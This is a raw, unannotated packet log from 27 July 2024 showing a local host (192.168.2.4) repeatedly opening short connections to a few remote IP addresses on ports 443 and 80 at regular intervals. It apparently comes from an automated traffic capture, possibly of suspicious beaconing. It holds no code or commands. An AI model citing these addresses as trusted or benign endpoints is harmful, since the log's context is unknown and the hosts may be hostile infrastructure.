                                                                              Jul 27, 2024 14:54:20.109256029 CEST49812443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:20.111639023 CEST49812443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:20.111660957 CEST44349812107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:20.111721039 CEST49812443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:20.111732006 CEST44349812107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:20.112018108 CEST44349812107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:20.112195015 CEST49812443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:20.112224102 CEST44349812107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:21.395046949 CEST44349812107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:21.395224094 CEST44349812107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:21.395314932 CEST49812443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:21.411473036 CEST49812443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:21.411473036 CEST49812443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:21.411519051 CEST44349812107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:21.411545038 CEST44349812107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:21.519145966 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:21.519227028 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:21.519309044 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:21.519912958 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:21.519944906 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:22.216065884 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:22.216190100 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:22.219082117 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:22.219132900 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:22.219214916 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:22.219228983 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:22.220153093 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:22.220335007 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:22.260572910 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:23.266138077 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:23.267268896 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:23.267350912 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:23.285271883 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:23.285310984 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:23.285341978 CEST49813443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:23.285357952 CEST44349813167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:23.396816969 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:23.396914005 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:23.396989107 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:23.399677038 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:23.399713993 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:24.016654968 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:24.016738892 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:24.019586086 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:24.019608021 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:24.019669056 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:24.019680023 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:24.020422935 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:24.020581007 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:24.020612001 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:25.162863016 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:25.162929058 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:25.162996054 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:25.177746058 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:25.177793026 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:25.177823067 CEST49814443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:25.177839041 CEST44349814107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:25.284564018 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:25.284610033 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:25.284743071 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:25.285212994 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:25.285242081 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:25.911928892 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:25.912157059 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:25.914949894 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:25.914971113 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:25.915040970 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:25.915050983 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:25.915148973 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:25.915158987 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:25.915466070 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:25.915632010 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:25.960531950 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:27.264324903 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:27.264529943 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:27.264605999 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:27.279916048 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:27.279967070 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:27.279999971 CEST49815443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:27.280018091 CEST44349815107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:27.393981934 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:27.394064903 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:27.394171953 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:27.394747972 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:27.394824982 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:28.071485996 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:28.071605921 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:28.074342966 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:28.074372053 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:28.074441910 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:28.074453115 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:28.074707985 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:28.074881077 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:28.120532990 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:29.054205894 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:29.054368973 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:29.054438114 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:29.070790052 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:29.070790052 CEST49816443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:29.070822001 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:29.070873022 CEST44349816167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:29.175323009 CEST49817443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:29.175405979 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:29.175533056 CEST49817443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:29.176018000 CEST49817443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:29.176049948 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:29.782416105 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:29.782500982 CEST49817443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:29.785200119 CEST49817443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:29.785226107 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:29.785289049 CEST49817443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:29.785300970 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:29.785737038 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:29.785897970 CEST49817443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:29.832519054 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:31.130439043 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:31.130606890 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:31.130676031 CEST49817443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:31.146238089 CEST49817443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:31.146276951 CEST44349817107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:31.258584976 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:31.258668900 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:31.258763075 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:31.259349108 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:31.259421110 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:31.868335009 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:31.868556976 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:31.871172905 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:31.871225119 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:31.871299982 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:31.871311903 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:31.871768951 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:31.871982098 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:31.916521072 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:32.786222935 CEST4981980192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:32.791789055 CEST8049819187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:32.792155981 CEST4981980192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:32.792155981 CEST4981980192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:32.792155981 CEST4981980192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:32.799175024 CEST8049819187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:32.799283981 CEST8049819187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:33.232402086 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:33.232609987 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:33.232688904 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:33.248498917 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:33.248498917 CEST49818443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:33.248532057 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:33.248547077 CEST44349818107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:33.362886906 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:33.362976074 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:33.363286018 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:33.363735914 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:33.363779068 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:33.846288919 CEST8049819187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:33.846751928 CEST8049819187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:33.846967936 CEST4981980192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:33.846967936 CEST4981980192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:33.853322029 CEST8049819187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:34.047081947 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:34.047270060 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:34.051242113 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:34.051296949 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:34.051619053 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:34.051667929 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:34.051742077 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:34.051754951 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:34.051924944 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:34.052124023 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:34.096570969 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:35.058320999 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:35.058501959 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:35.058578014 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:35.075155973 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:35.075201035 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:35.075229883 CEST49820443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:35.075244904 CEST44349820167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:35.191366911 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:35.191415071 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:35.191488028 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:35.191956043 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:35.191988945 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:35.791773081 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:35.792035103 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:35.794470072 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:35.794498920 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:35.794563055 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:35.794583082 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:35.795308113 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:35.795486927 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:35.836535931 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:37.172682047 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:37.172852039 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:37.172931910 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:37.186465979 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:37.186522007 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:37.186553955 CEST49821443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:37.186572075 CEST44349821107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:37.300653934 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:37.300740004 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:37.300877094 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:37.301229954 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:37.301265955 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:37.889332056 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:37.889422894 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:37.892085075 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:37.892112017 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:37.892178059 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:37.892189980 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:37.892512083 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:37.892683983 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:37.892714024 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:38.436110020 CEST4982380192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:38.441891909 CEST8049823187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:38.442030907 CEST4982380192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:38.442140102 CEST4982380192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:38.442157030 CEST4982380192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:38.447355032 CEST8049823187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:38.447396040 CEST8049823187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:39.145781994 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:39.145973921 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:39.146047115 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:39.161545992 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:39.161590099 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:39.161617994 CEST49822443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:39.161634922 CEST44349822107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:39.268927097 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:39.269000053 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:39.269087076 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:39.269632101 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:39.269663095 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:39.497384071 CEST8049823187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:39.497437954 CEST8049823187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:39.497504950 CEST4982380192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:39.497651100 CEST4982380192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:39.502449036 CEST8049823187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:39.957024097 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:39.957129955 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:39.960052967 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:39.960071087 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:39.960125923 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:39.960135937 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:39.961175919 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:39.961309910 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:40.004542112 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:41.022166014 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:41.022336960 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:41.022428989 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:41.039393902 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:41.039441109 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:41.039470911 CEST49824443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:41.039486885 CEST44349824167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:41.155430079 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:41.155509949 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:41.155584097 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:41.160556078 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:41.160593033 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:41.751802921 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:41.751908064 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:41.754791021 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:41.754811049 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:41.754924059 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:41.754934072 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:41.755631924 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:41.755789042 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:41.796572924 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:43.098896980 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:43.099070072 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:43.099154949 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:43.113820076 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:43.113864899 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:43.113893986 CEST49825443192.168.2.4107.173.160.137
                                                                              Jul 27, 2024 14:54:43.113910913 CEST44349825107.173.160.137192.168.2.4
                                                                              Jul 27, 2024 14:54:43.222059011 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:43.222090960 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:43.222187042 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:43.222717047 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:43.222732067 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:43.412358046 CEST4982780192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:43.418107033 CEST8049827187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:43.418353081 CEST4982780192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:43.418462992 CEST4982780192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:43.418494940 CEST4982780192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:43.424515009 CEST8049827187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:43.424559116 CEST8049827187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:43.823575974 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:43.823683977 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:43.826266050 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:43.826272011 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:43.826337099 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:43.826342106 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:43.826385021 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:43.826389074 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:43.827085018 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:43.827230930 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:43.827244997 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:44.446554899 CEST8049827187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:44.446600914 CEST8049827187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:44.446732044 CEST4982780192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:44.450795889 CEST4982780192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:54:44.461648941 CEST8049827187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:54:44.976286888 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:44.976527929 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:44.976583958 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:44.992384911 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:44.992398977 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:44.992432117 CEST49826443192.168.2.4107.173.160.139
                                                                              Jul 27, 2024 14:54:44.992438078 CEST44349826107.173.160.139192.168.2.4
                                                                              Jul 27, 2024 14:54:45.097156048 CEST49828443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:45.097208977 CEST44349828167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:45.097295046 CEST49828443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:45.097702980 CEST49828443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:45.097723007 CEST44349828167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:45.805099964 CEST44349828167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:45.805356979 CEST49828443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:45.807542086 CEST49828443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:45.807555914 CEST44349828167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:45.807703972 CEST49828443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:45.807708979 CEST44349828167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:45.808692932 CEST44349828167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:45.808831930 CEST49828443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:45.852544069 CEST44349828167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:46.897692919 CEST44349828167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:46.897845030 CEST44349828167.235.128.153192.168.2.4
                                                                              Jul 27, 2024 14:54:46.897914886 CEST49828443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:46.914099932 CEST49828443192.168.2.4167.235.128.153
                                                                              Jul 27, 2024 14:54:46.914124012 CEST44349828167.235.128.153192.168.2.4
